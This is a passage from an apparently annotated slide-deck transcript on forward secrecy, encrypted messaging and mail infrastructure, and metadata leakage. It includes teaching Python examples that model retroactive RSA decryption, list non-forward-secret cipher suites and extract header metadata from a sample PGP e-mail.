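    if transcript["kx"] == "RSA":
        premaster = pow(transcript["encrypted_premaster"], d, N)
        return kdf(premaster)
    # DHE: the key lets the attacker forge *future* signatures, but nothing in
    # the recording yields g^(ab) without a or b, which no longer exist anywhere.
    return None


PFS_KX_PREFIXES = ("ECDHE-", "DHE-", "EDH-")


def suites_without_pfs(cipher_string: str) -> list:
    """Suites in an OpenSSL-style cipher string whose key exchange is not
    ephemeral, i.e. the ones a leaked server key can unlock retroactively."""
    return [s for s in cipher_string.split(":") if not s.startswith(PFS_KX_PREFIXES)]


if __name__ == "__main__":
    key, t = rsa_handshake()
    print("RSA session recovered:", attacker_with_private_key(t) == key)   # True
    key, t = dhe_handshake()
    print("DHE session recovered:", attacker_with_private_key(t) == key)   # False
    print(suites_without_pfs("ECDHE-RSA-AES128-SHA:AES128-SHA:RC4-SHA"))   # the non-PFS tail
```

The practical check on a server is the same as the helper: anything in the negotiated cipher list that does not start with ECDHE/DHE/EDH means the slide 45 attack stays possible for as long as the private key lives.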
68. Secure communications (mostly): perfect forward secrecy. With forward secrecy (TextSecure's OTR-style ratchet). https://whispersystems.org/blog/advanced-ratcheting/
69. Secure communications (mostly): perfect forward secrecy for Apache & NGINX. "Configuring Apache, Nginx, and OpenSSL for Forward Secrecy" http://bit.ly/1hmsysR
70. Secure communications (mostly): perfect forward secrecy for Gtalk, Hangouts, Facebook Chat and any XMPP-based IM. "Pidgin with OTR - Secure Instant Messaging" https://securityinabox.org/en/pidgin_main "Encrypt your GTalk / Hangout / Facebook chat" http://phrozenblog.com/?p=615
71. Secure communications (mostly): perfect forward secrecy for mobile messaging. TextSecure Private Messenger (Android only) https://play.google.com/store/apps/details?id=org.thoughtcrime.securesms Telegram (Android & iOS) https://telegram.org/ (Caveat: only Telegram's "secret chats" are end-to-end encrypted; regular chats are encrypted to Telegram's servers, which can read them.)
72. Secure communications (mostly): perfect forward secrecy for voice calls: VoIP with ZRTP. http://en.wikipedia.org/wiki/ZRTP
73. Secure communications (mostly): mobile ZRTP. RedPhone (Android only) https://play.google.com/store/apps/details?id=org.thoughtcrime.redphone
74. Secure communications (mostly): platform S/ZRTP. https://jitsi.org/Main/HomePage
75. Secure communications (mostly): platform S/ZRTP. "How To Encrypt Chat And VoIP With Jitsi and XMPP" http://bit.ly/1jvlbo7
76. Secure communication infrastructure
77. Secure communication infrastructure: encryption makes things slower. More load to process, more time to process.
78. Secure communication infrastructure: first, choose your preferred Linux flavor (or BSD if you want :)).
79. Secure communication infrastructure: let's start with some good full-disk encryption. Most distros' installers offer this option nowadays, and it's not hard to implement if you are already a sysadmin. https://library.linode.com/security/full-disk-encryption Keep in mind that full-disk encryption protects data at rest (a stolen or decommissioned disk); once the system is booted and the volume unlocked, a compromised host reads everything in the clear.
80. Secure communication infrastructure: then harden that system, baby! Fix your perms (least-privilege principle). Set up your services' configuration properly. Uninstall bloatware and apply security updates. Use a host firewall (at least). *Disable kernel module loading. *Install PaX/grsecurity patches (http://grsecurity.net/). *Not for the faint of heart.
81. Secure communication infrastructure: SSL EVERYWHERE. In every communication between services, SSL must be enforced. Do certificate pinning. https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning
82. Secure communication infrastructure: LDAP for identity management & authentication. Most software has support for LDAP as a backend.
83. Secure communication infrastructure: pretty default mail stack. Postfix + Dovecot + dspam + postgrey + LDAP auth backend.
84. Secure communication infrastructure: we add automatic PGP encryption to it. "Heyyyy, but you said PGP sucks!" I never said that! It's still better than plaintext! https://github.com/mikecardwell/gpgit https://perot.me/encrypt-specific-incoming-emails-using-dovecot-and-sieve Note that this encrypts mail on arrival, so it protects the stored mailbox, not the delivery path: the server (and anyone who owns it) sees the plaintext before it is encrypted.
85. Secure communication infrastructure: PGP-supporting software. Thunderbird handles it well with the Enigmail plugin (https://addons.mozilla.org/en-US/thunderbird/addon/enigmail/). K-9 Mail (Android) only handles low-quality PGP keys (due to an APG limitation). Other mail clients may support PGP too.
86. Secure communication infrastructure: XMPP for chat. It will use SSL for the connection, but clients need to do OTR on their side.
87. Secure communication infrastructure: XMPP for chat. ejabberd + punjab BOSH proxy + LDAP auth backend + MySQL roster backend. http://www.ejabberd.im/ https://github.com/twonds/punjab
88. Secure communication infrastructure: compliant XMPP+OTR clients. Win/Mac OS X/Linux: Pidgin (https://pidgin.im/). Android: Xabber (http://www.xabber.org/). iOS/Android: ChatSecure (http://chrisballinger.info/apps/chatsecure/).
89. Secure communication infrastructure: XMPP+OTR clients + S/ZRTP. https://jitsi.org/Main/HomePage
90. Secure communication infrastructure: optional insecure feature, web-mail interface. Browsers are vulnerable to many attacks. Open-source web-mail software still needs to mature. Crypto in the browser is a little creepy.
91. Secure communication infrastructure: optional insecure feature, web-mail interface. Roundcube + rc_openpgpjs + LDAP auth backend; converse.js for embedded chat. http://roundcube.net/ https://github.com/qnrq/rc_openpgpjs https://github.com/jcbrand/converse.js/ https://github.com/priyadi/roundcube-converse.js-xmpp-plugin
92. Secure communication infrastructure: the final product
93. The remaining points of failure
94. The remaining points of failure: metadata is gold and is always leaking out. Metadata is "data about data". http://en.wikipedia.org/wiki/Metadata
95. The remaining points of failure: metadata is gold and is always leaking out. Metadata carries lots of Personally Identifiable Information (PII) and can be very helpful in correlating people and events. It leaks everywhere: DNS, web, e-mail, documents, images, photos from cameras and cellphones, etc.
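Slide 56 (PGP doesn't protect metadata) and the two metadata slides above make the same point; this added example (not from the talk) shows it on an e-mail. The message is constructed for illustration, with a PGP/MIME body whose ciphertext is elided; the function collects everything a relay, a mailbox provider or a wiretap still learns without ever touching that ciphertext.

```python
import re
from email import message_from_bytes
from email.utils import parseaddr, parsedate_to_datetime

# Constructed PGP/MIME message as it would sit in the recipient's mailbox
SAMPLE = b"""Received: from mail.example.org (mail.example.org [192.0.2.10])
\tby mx.example.net with ESMTPS id abc123; Tue, 06 May 2014 14:02:11 -0300
Received: from [198.51.100.7] (dsl-pool.example.org [198.51.100.7])
\tby mail.example.org with ESMTPSA; Tue, 06 May 2014 14:02:09 -0300
From: Alice <alice@example.org>
To: Bob <bob@example.net>
Subject: Q3 numbers (confidential)
Date: Tue, 06 May 2014 14:02:05 -0300
Message-ID: <20140506170205.GA1234@laptop.alice.lan>
User-Agent: Mutt/1.5.23 (2014-03-12)
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="b1"

--b1
Content-Type: application/pgp-encrypted

Version: 1

--b1
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
(ciphertext elided)
-----END PGP MESSAGE-----
--b1--
"""

IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def leaked_metadata(raw: bytes) -> dict:
    """Everything an observer gets from the headers alone."""
    msg = message_from_bytes(raw)
    hops = []
    for received in msg.get_all("Received", []):
        flat = " ".join(received.split())          # unfold the header
        sender_part, _, rest = flat.partition(" by ")
        hops.append({
            "from": sender_part.replace("from ", "", 1),
            "by": rest.split()[0] if rest else "",
            "ips": sorted(set(IPV4.findall(flat))),   # relay and origin addresses
        })
    return {
        "sender": parseaddr(msg["From"])[1],
        "recipient": parseaddr(msg["To"])[1],
        "subject": msg["Subject"],                     # never encrypted by PGP/MIME
        "sent_at": parsedate_to_datetime(msg["Date"]).isoformat(),
        "client": msg["User-Agent"],
        "origin_host": msg["Message-ID"].split("@")[-1].rstrip(">"),
        "hops": hops,                                  # every server in the path
        "body_readable": msg.get_content_type() != "multipart/encrypted",
    }


if __name__ == "__main__":
    for key, value in leaked_metadata(SAMPLE).items():
        print(f"{key}: {value}")
```

Who talked to whom, when, about what, from which machine on which network, through which providers: all of it is there, with body_readable False. That is why the talk treats metadata, not ciphertext, as the remaining point of failure.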
96. The remaining points of failure: code may have bugs, even the code meant to secure us. Just like OpenSSL's Heartbleed and Apple's "goto fail".
97. The remaining points of failure: code may have features. http://bit.ly/18DOX71
98. The remaining points of failure: code may have features. http://cnet.co/1rVzAL0
99. The remaining points of failure: code may have features. http://bit.ly/1hO99Uo
100. The remaining points of failure: agencies can be very persuasive.
101. Closing up: "So I'll never be completely safe?"
102. Closing up: "Well, so I don't need to do security at all."
103. Closing up: we know security is not easy. Security = Usability^-1
104. Closing up: sometimes it can be a pain.
105. Closing up: but you gotta take care out there!
106. That's all folks! http://wroot.org @jseidl jseidl@wroot.org https://github.com/jseidl/ http://www.slideshare.net/jseidl